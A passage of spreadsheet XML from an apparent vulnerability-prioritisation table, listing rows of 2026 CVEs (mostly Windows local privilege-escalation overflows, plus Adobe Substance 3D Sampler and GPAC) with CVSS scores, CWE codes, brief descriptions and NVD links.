      <c r="I2226" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2226" s="5" t="inlineStr"/>
      <c r="K2226" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2226" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2226" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70583</t>
        </is>
      </c>
    </row>
    <row r="2227">
      <c r="A2227" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2227" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70584</t>
        </is>
      </c>
      <c r="C2227" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2227" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2227" s="5" t="inlineStr"/>
      <c r="F2227" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2227" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2227" s="5" t="inlineStr"/>
      <c r="I2227" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2227" s="5" t="inlineStr"/>
      <c r="K2227" s="5" t="inlineStr">
        <is>
          <t>CWE-843</t>
        </is>
      </c>
      <c r="L2227" s="5" t="inlineStr">
        <is>
          <t>Access of resource using incompatible type ('type confusion') in Windows Core Messaging allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2227" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70584</t>
        </is>
      </c>
    </row>
    <row r="2228">
      <c r="A2228" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2228" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71334</t>
        </is>
      </c>
      <c r="C2228" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2228" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2228" s="5" t="inlineStr"/>
      <c r="F2228" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2228" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2228" s="5" t="inlineStr"/>
      <c r="I2228" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2228" s="5" t="inlineStr"/>
      <c r="K2228" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2228" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows NFS Portmapper allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2228" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71334</t>
        </is>
      </c>
    </row>
    <row r="2229">
      <c r="A2229" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2229" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71337</t>
        </is>
      </c>
      <c r="C2229" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2229" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2229" s="5" t="inlineStr"/>
      <c r="F2229" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2229" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2229" s="5" t="inlineStr"/>
      <c r="I2229" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2229" s="5" t="inlineStr"/>
      <c r="K2229" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-130</t>
        </is>
      </c>
      <c r="L2229" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Windows Storage Management Provider allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2229" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71337</t>
        </is>
      </c>
    </row>
    <row r="2230">
      <c r="A2230" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2230" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71343</t>
        </is>
      </c>
      <c r="C2230" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2230" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2230" s="5" t="inlineStr"/>
      <c r="F2230" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2230" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2230" s="5" t="inlineStr"/>
      <c r="I2230" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2230" s="5" t="inlineStr"/>
      <c r="K2230" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2230" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Access Connection Manager allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2230" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71343</t>
        </is>
      </c>
    </row>
    <row r="2231">
      <c r="A2231" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2231" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71345</t>
        </is>
      </c>
      <c r="C2231" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2231" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2231" s="5" t="inlineStr"/>
      <c r="F2231" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2231" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2231" s="5" t="inlineStr"/>
      <c r="I2231" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2231" s="5" t="inlineStr"/>
      <c r="K2231" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2231" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds write in Windows Spaceport.sys allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2231" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71345</t>
        </is>
      </c>
    </row>
    <row r="2232">
      <c r="A2232" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2232" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71382</t>
        </is>
      </c>
      <c r="C2232" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2232" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2232" s="5" t="inlineStr"/>
      <c r="F2232" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2232" s="5" t="inlineStr"/>
      <c r="H2232" s="5" t="inlineStr">
        <is>
          <t>adobe:substance_3d_sampler</t>
        </is>
      </c>
      <c r="I2232" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="J2232" s="5" t="inlineStr"/>
      <c r="K2232" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2232" s="5" t="inlineStr">
        <is>
          <t>Substance3D - Sampler is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2232" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71382</t>
        </is>
      </c>
    </row>
    <row r="2233">
      <c r="A2233" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2233" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71613</t>
        </is>
      </c>
      <c r="C2233" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2233" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2233" s="5" t="inlineStr"/>
      <c r="F2233" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2233" s="5" t="inlineStr"/>
      <c r="H2233" s="5" t="inlineStr"/>
      <c r="I2233" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2233" s="5" t="inlineStr"/>
      <c r="K2233" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="L2233" s="5" t="inlineStr">
        <is>
          <t>Buffer Overflow vulnerability in GPAC c2dee3aff638cd96f9617ac5b17dc2868cd90ef3 allows an attacker to execute arbitrary code via the j2kdec_process() function. Fixed in 9a253a07fd3f6b48022bba74302bf39388dda859.</t>
        </is>
      </c>
      <c r="M2233" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71613</t>
        </is>
      </c>
    </row>
    <row r="2234">
      <c r="A2234" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2234" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72929</t>
        </is>
      </c>
      <c r="C2234" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2234" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2234" s="5" t="inlineStr"/>
      <c r="F2234" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2234" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2234" s="5" t="inlineStr"/>
      <c r="I2234" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2234" s="5" t="inlineStr"/>
      <c r="K2234" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="L2234" s="5" t="inlineStr">
        <is>
          <t>Improper validation of integrity check value in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2234" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72929</t>
        </is>
      </c>
    </row>
    <row r="2235">
      <c r="A2235" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2235" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72941</t>
        </is>
      </c>
      <c r="C2235" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2235" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2235" s="5" t="inlineStr"/>
      <c r="F2235" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2235" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2235" s="5" t="inlineStr"/>
      <c r="I2235" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2235" s="5" t="inlineStr"/>
      <c r="K2235" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2235" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2235" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72941</t>
        </is>
      </c>
    </row>
    <row r="2236">
      <c r="A2236" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2236" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72944</t>
        </is>
      </c>
      <c r="C2236" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2236" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2236" s="5" t="inlineStr"/>
      <c r="F2236" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2236" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2236" s="5" t="inlineStr"/>
      <c r="I2236" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2236" s="5" t="inlineStr"/>
      <c r="K2236" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2236" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Fax Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2236" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72944</t>
        </is>
      </c>
    </row>
    <row r="2237">
      <c r="A2237" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2237" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72946</t>
        </is>
      </c>
      <c r="C2237" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2237" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2237" s="5" t="inlineStr"/>
      <c r="F2237" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2237" s="5" t="inlineStr"/>
      <c r="H2237" s="5" t="inlineStr"/>
      <c r="I2237" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2237" s="5" t="inlineStr"/>
      <c r="K2237" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2237" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Storage Port Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2237" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72946</t>
        </is>
      </c>
    </row>
    <row r="2238">
      <c r="A2238" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2238" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72953</t>
        </is>
      </c>
      <c r="C2238" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2238" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2238" s="5" t="inlineStr"/>
      <c r="F2238" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2238" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2238" s="5" t="inlineStr"/>
      <c r="I2238" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2238" s="5" t="inlineStr"/>
      <c r="K2238" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2238" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2238" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72953</t>
        </is>
      </c>
    </row>
    <row r="2239">
      <c r="A2239" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2239" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72957</t>
        </is>
      </c>
      <c r="C2239" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2239" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2239" s="5" t="inlineStr"/>
      <c r="F2239" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2239" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2239" s="5" t="inlineStr"/>
      <c r="I2239" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2239" s="5" t="inlineStr"/>
      <c r="K2239" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2239" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Deployment Services allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M2239" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72957</t>
        </is>
      </c>
    </row>
    <row r="2240">
      <c r="A2240" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2240" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72965</t>
        </is>
      </c>
      <c r="C2240" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2240" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2240" s="5" t="inlineStr"/>
      <c r="F2240" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2240" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2240" s="5" t="inlineStr"/>
      <c r="I2240" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2240" s="5" t="inlineStr"/>
      <c r="K2240" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2240" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows WebClient Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72965</t>
        </is>
      </c>
    </row>
    <row r="2241">
      <c r="A2241" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72967</t>
        </is>
      </c>
      <c r="C2241" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2241" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2241" s="5" t="inlineStr"/>
      <c r="F2241" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2241" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2241" s="5" t="inlineStr"/>
      <c r="I2241" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2241" s="5" t="inlineStr"/>
      <c r="K2241" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2241" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Network Connection Broker allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72967</t>
        </is>
      </c>
    </row>
    <row r="2242">
      <c r="A2242" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72988</t>
        </is>
      </c>
      <c r="C2242" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2242" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2242" s="5" t="inlineStr"/>
      <c r="F2242" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2242" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2242" s="5" t="inlineStr"/>
      <c r="I2242" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2242" s="5" t="inlineStr"/>
      <c r="K2242" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2242" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72988</t>
        </is>
      </c>
    </row>
    <row r="2243">
      <c r="A2243" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72990</t>
        </is>
      </c>
      <c r="C2243" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2243" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2243" s="5" t="inlineStr"/>
      <c r="F2243" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2243" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H224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43" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2243" s="5" t="inlineStr"/>
      <c r="K2243" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2243" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72990</t>
        </is>
      </c>
    </row>
    <row r="2244">
      <c r="A2244" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72991</t>
        </is>
      </c>
      <c r="C2244" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2244" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2244" s="5" t="inlineStr"/>
      <c r="F2244" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2244" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2244" s="5" t="inlineStr"/>
      <c r="I2244" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2244" s="5" t="inlineStr"/>
      <c r="K2244" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2244" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72991</t>
        </is>
      </c>
    </row>
    <row r="2245">
      <c r="A2245" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72992</t>
        </is>
      </c>
      <c r="C2245" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2245" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2245" s="5" t="inlineStr"/>
      <c r="F2245" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2245" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2245" s="5" t="inlineStr"/>
      <c r="I2245" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2245" s="5" t="inlineStr"/>
      <c r="K2245" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2245" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72992</t>
        </is>
      </c>
    </row>
    <row r="2246">
      <c r="A2246" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72993</t>
        </is>
      </c>
      <c r="C2246" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2246" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2246" s="5" t="inlineStr"/>
      <c r="F2246" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2246" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2246" s="5" t="inlineStr"/>
      <c r="I2246" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2246" s="5" t="inlineStr"/>
      <c r="K2246" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2246" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72993</t>
        </is>
      </c>
    </row>
    <row r="2247">
      <c r="A2247" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72994</t>
        </is>
      </c>
      <c r="C2247" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2247" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2247" s="5" t="inlineStr"/>
      <c r="F2247" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2247" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2247" s="5" t="inlineStr"/>
      <c r="I2247" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2247" s="5" t="inlineStr"/>
      <c r="K2247" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2247" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72994</t>
        </is>
      </c>
    </row>
    <row r="2248">
      <c r="A2248" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72995</t>
        </is>
      </c>
      <c r="C2248" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2248" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2248" s="5" t="inlineStr"/>
      <c r="F2248" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2248" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H224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48" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2248" s="5" t="inlineStr"/>
      <c r="K2248" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L2248" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72995</t>
        </is>
      </c>
    </row>
    <row r="2249">
      <c r="A2249" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2249" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72996</t>
        </is>
      </c>
      <c r="C2249" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2249" s="5" t="inlineStr"/>
      <c r="F2249" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2249" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2249" s="5" t="inlineStr"/>
      <c r="I2249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2249" s="5" t="inlineStr"/>
      <c r="K2249" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2249" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t>
        </is>
      </c>
    </row>
    <row r="2250">
      <c r="A2250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="C2250" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2250" s="5" t="inlineStr"/>
      <c r="F2250" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2250" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2250" s="5" t="inlineStr"/>
      <c r="I2250" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2250" s="5" t="inlineStr"/>
      <c r="K2250" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2250" s="5" t="inlineStr">
        <is>
